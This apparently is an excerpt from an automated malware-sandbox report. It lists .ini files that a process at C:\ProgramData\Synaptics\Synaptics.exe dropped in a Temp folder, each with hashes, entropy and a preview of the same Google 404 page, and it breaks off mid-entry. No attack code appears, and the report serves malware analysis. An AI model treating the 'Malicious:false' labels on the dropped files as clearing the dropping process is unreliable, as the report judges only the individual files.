                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BfGyPs7B4UgK/DghJRVJcw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\QyMIb8e.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2655774870128145
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0IbzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+1bz+pAZewRDK4mW
                                                                                                                                                                                        MD5:2F81B6D0619BB98420B7CB35E90AF75C
                                                                                                                                                                                        SHA1:99E4D8A27A3DD7D01E2D593FE7902F444643FF99
                                                                                                                                                                                        SHA-256:8AADFAD099C4B2D196DABEB1618CAAE5CCBA340286E1271F6B73BE149D566C44
                                                                                                                                                                                        SHA-512:4690B7B56D11713BE80BBB967F10A75A6131E3E4C0AAF13DE811B83C6A606C4B7A6D40A37AEBA22625B65E7ED234DA0E8E28E334FD0E13FAF4BD7A48586AF659
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gDHNLCCTlZOGfmpeWyh2kA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RAPL7rB.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2492072926349955
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0GrSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+T+pAZewRDK4mW
                                                                                                                                                                                        MD5:C26CC5CBC061DDA2ED80A57DE7F78FF0
                                                                                                                                                                                        SHA1:BDF5D68770EF1E337A1F32C27DBD84D023314643
                                                                                                                                                                                        SHA-256:786B2F882179C972BFC6482405CE4A8E3EFFBDE9FBA30318B53CD443B0CD42ED
                                                                                                                                                                                        SHA-512:682D682CD67FA4A11B4403965794FB06AF044848744F9848A00C7988B880DECE95A287CBA19E354326CD76150CD0BF45086124D2A32BE6B8E2D7DCE004B29BB6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="49h7zctn48uPIZfxiP7g4g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RMLBnsP.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.255807887013756
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0PxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+O+pAZewRDK4mW
                                                                                                                                                                                        MD5:C4976676EA426E56940F79FF3E1F3903
                                                                                                                                                                                        SHA1:F1EC8F779EAE18275E9AB24EBF391F663274C7A4
                                                                                                                                                                                        SHA-256:96258B51301B914674643507D2FC6DA2661F0E61E4DCF616F5CF7517BBB42250
                                                                                                                                                                                        SHA-512:543827C92B895CE376D81D27B1F3EDDFE4D374DB8CD8CE2B27048435CE4D936F0172135905E81EB8AF01DD49C46DCD68B6383A681FD3C598B5F8FB8CCB729669
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9DdX2uLuIDjgB5y/ahr4Bw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RRl7lOk.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263929468824969
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                        MD5:511895A026363DC1B27B432AB3C88462
                                                                                                                                                                                        SHA1:90821C08C766003EFA4DC895884F7A6BD0502906
                                                                                                                                                                                        SHA-256:08F7570B015EE68CAC04A03AF4BA5C329F01E73BCA86CE3223FAC667DFA62B1E
                                                                                                                                                                                        SHA-512:0A6357BA8C69D05C73FF0105B54CBCB517535D19C5100E1351299D581D2375A3C21A83266091F54C77176C0860F1CBDADAB4FED974512B2F677E71BAB89FEB4A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UDWyT3Jut/op/ABi+y1JRQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\RhkoEFp.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.25105021487194
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0dcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+t+pAZewRDK4mW
                                                                                                                                                                                        MD5:B3FE518FB56114077EDACF60F3750A7C
                                                                                                                                                                                        SHA1:81F430989D7194A8B6D358D4B81F0B1FC376B019
                                                                                                                                                                                        SHA-256:03FCD9A3836D3B51CFA893C2D07B60129E5645215080FDAA25E0075B796D92B7
                                                                                                                                                                                        SHA-512:9DD2586E04EAA80578678D0C9EF086D88494D129B91FFAEDD5C3574F89030EB281A275A74ADD0DB7550AC529A1CC4414DA393E133C36C7D0AD9B1A4DC6CB5BE4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hitU2ag6R/i9D622NzDxoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\SRXCJrG.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.252376875000933
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0BTZmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+UTZm+pAZewRDK4mW
                                                                                                                                                                                        MD5:AA99CED786FDE90E20AE12D258239F06
                                                                                                                                                                                        SHA1:36BE5B746911886FB7064EEA57C92323A1807F3A
                                                                                                                                                                                        SHA-256:562E1D0296528D0AC3FBF8720312F4EB7FC47F8B858CF0AE78D45B1A9495A3AF
                                                                                                                                                                                        SHA-512:A32C942102F83A2B6FE26352034313C2EE688850313419AAE022A5547288634A0BAE67990F291EBDE0C35C3F455CE68F0B77B2C5CA564AAE462BF1BF512DFBFD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JYLn1XiKU2lgfCndu7wl2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Sj65IvD.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.252044346275562
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0I2SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+N2+pAZewRDK4mW
                                                                                                                                                                                        MD5:35493393D3BE91A5756EAD723A0D8EAE
                                                                                                                                                                                        SHA1:881C809886CDD68CFBE5BCA5B06FEC0ED37A08B8
                                                                                                                                                                                        SHA-256:33B327BAD8E46C48C4529ED5A1EB6BD93044170389FF29295E44BF50D99D4383
                                                                                                                                                                                        SHA-512:5C1E3D425C3D98FDB5515CB4F49531B3A6B66CEB67334BE420B42518940724B049BDE22B9A52ED9686319A7C826C96AF29974B0EC067132D7EAE85989C9110C2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/oaoVK5k0i/jqOLUTB4d1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TKCilkS.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.268331966858906
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0TbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+4+pAZewRDK4mW
                                                                                                                                                                                        MD5:B25E21425F0C6E4A37DBC0AA6A4628B3
                                                                                                                                                                                        SHA1:704EA45E986441E71502BAAEDB844B61DCACA524
                                                                                                                                                                                        SHA-256:A2EADDE1FF54DAA716A48DF290A61893370A1B1CDC39FFF8862E4AF912A1332F
                                                                                                                                                                                        SHA-512:11231254F73E3EF9AFB2DEACC5CA71C8D6161A29A2578C23642C0CCC8F582412B15F4636B0F092F46BB2BC4EA9A74FAEA6D158133C355BD832E182F8BB3E5DBF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MDOyyPq8D5vus2M+mahvWQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\ThMUD7c.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263749663304703
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0gnkXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+bkX+pAZewRDK4mW
                                                                                                                                                                                        MD5:F46B4F6911E32697EBFBC670DBD690A7
                                                                                                                                                                                        SHA1:81B2B6581EC2BAF23399C4E2A5864A76D1CC51DE
                                                                                                                                                                                        SHA-256:19C0B7D88C7E67F7EEE0BC21590CE1EAE8895C2F40C46D8E00F25450B9865821
                                                                                                                                                                                        SHA-512:3D95276F55B5ADD3D5EF58609FF86F5650B9EB5C607E2D020E95F08232782EF1E89DC29530C433795FFE64A3120CD71653DFD0351378083DC8BE616A0C62023D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H3EP5Xag1wR34CtZjrcbGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TlV5qOe.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.260097072852933
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0ovzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+5+pAZewRDK4mW
                                                                                                                                                                                        MD5:417842F4ABF6DE22F7D617EF95A47E51
                                                                                                                                                                                        SHA1:A18B294328AE70A78FA245C165BE454851DC2E62
                                                                                                                                                                                        SHA-256:EF185EE75F8657CD6061630EF27F548B3D74B878CE561D07ABB0B30708951214
                                                                                                                                                                                        SHA-512:AAB0716F62D2AE5A74FDEA60F057831A66FE9B3100749CCB79592C7FED788F015FF5920BCCFDD057E951B240E53A89EB11899387B4B66B88A38BA267C702574B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sudyl9KyArMLwUz517IFbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UFTcPWQ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2623125810748315
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0aSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Z+pAZewRDK4mW
                                                                                                                                                                                        MD5:6EA6C6E0F41384B96440B4829373277D
                                                                                                                                                                                        SHA1:5E526A9D24E0B6D548F35AF795DB540A3D35C096
                                                                                                                                                                                        SHA-256:561DC87E129A04DFD47CD0286CA7D5B4710524AA8167717E29884B380791529D
                                                                                                                                                                                        SHA-512:3535E1980DD0982D17D87C632ABA30D72A50B13387EDEA19EBD1D5D2EB88290C25D70ABBD87105D951AC08801F121F1130A1FA6B9A67C766F6AC6341B2D015E1
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HaC/TQm1BkfiPZS7meOhcA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UGHnO9W.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.252490324910237
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0UMiSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+D+pAZewRDK4mW
                                                                                                                                                                                        MD5:402D93F324E89993DD8662DC7DC70435
                                                                                                                                                                                        SHA1:6D40C94A9C451717594A29804DBE49C86F8BF2EC
                                                                                                                                                                                        SHA-256:3A6513DC7824428E7F265FCE4C2509DF86AC42B08CA02BFDDAA313C7D318003E
                                                                                                                                                                                        SHA-512:09D1B7D41D279A6A2F1A7DCB5D6274B6C7E9052E2988881A1A13127DBCFD6B6639A0C44493BDCC1ED567423FE1BEF8D82790A68465606DF258D4C720919656B4
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qqidGTvX4ewoqqTTGpAi2A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\UMnIhSK.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.2454935790816055
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+06LSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+3+pAZewRDK4mW
                                                                                                                                                                                        MD5:0A8097B59537CC6A2ACDBA187F0785EC
                                                                                                                                                                                        SHA1:63429CCD36F28A0836815657C66FB343A6D10D2C
                                                                                                                                                                                        SHA-256:343EBCE80FF8DEA466373080195F87CEB90100E77C4AAD05EB1E100C37FD900D
                                                                                                                                                                                        SHA-512:178EEF489764433765C85973B058EB67FCD4135B9C4E13E8CAB26B6BC137EE8FC3BA4CC649B02DEEFF9C335DB663976EC9419B22432086A52FA377BF677D696E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="figA525c6WdwLh1ti2ZZ2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\USuyzXZ.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263890332035381
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+F+pAZewRDK4mW
                                                                                                                                                                                        MD5:6BC52B1B804795E46EC5059F6FFAAAFD
                                                                                                                                                                                        SHA1:A26D907A04F1AC42F3BE21393D4A01ECC144D6F7
                                                                                                                                                                                        SHA-256:DF1E828F9F308B578E4FE78956F7E63DA2BE60599FD7008E351FAFFF7EB63D8E
